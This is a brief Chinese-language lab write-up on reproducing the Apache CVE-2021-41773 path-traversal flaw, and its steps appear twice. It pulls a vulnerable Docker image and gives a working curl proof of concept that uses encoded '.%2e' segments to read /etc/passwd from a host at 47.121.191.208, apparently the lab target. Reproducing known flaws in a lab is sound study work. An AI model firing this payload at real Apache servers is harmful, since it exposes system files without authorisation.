Apache CVE-2021-41773 漏洞复现
1.打开环境
docker pull blueteamsteve/cve-2021-41773:no-cgid
docker run -d -p 8080:80 97308de4753d
2.访问靶场
3.使用poc
curl http://47.121.191.208:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
4.工具验证
1.打开环境
docker pull blueteamsteve/cve-2021-41773:no-cgid
docker run -d -p 8080:80 97308de4753d
2.访问靶场
3.使用poc
curl http://47.121.191.208:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
4.工具验证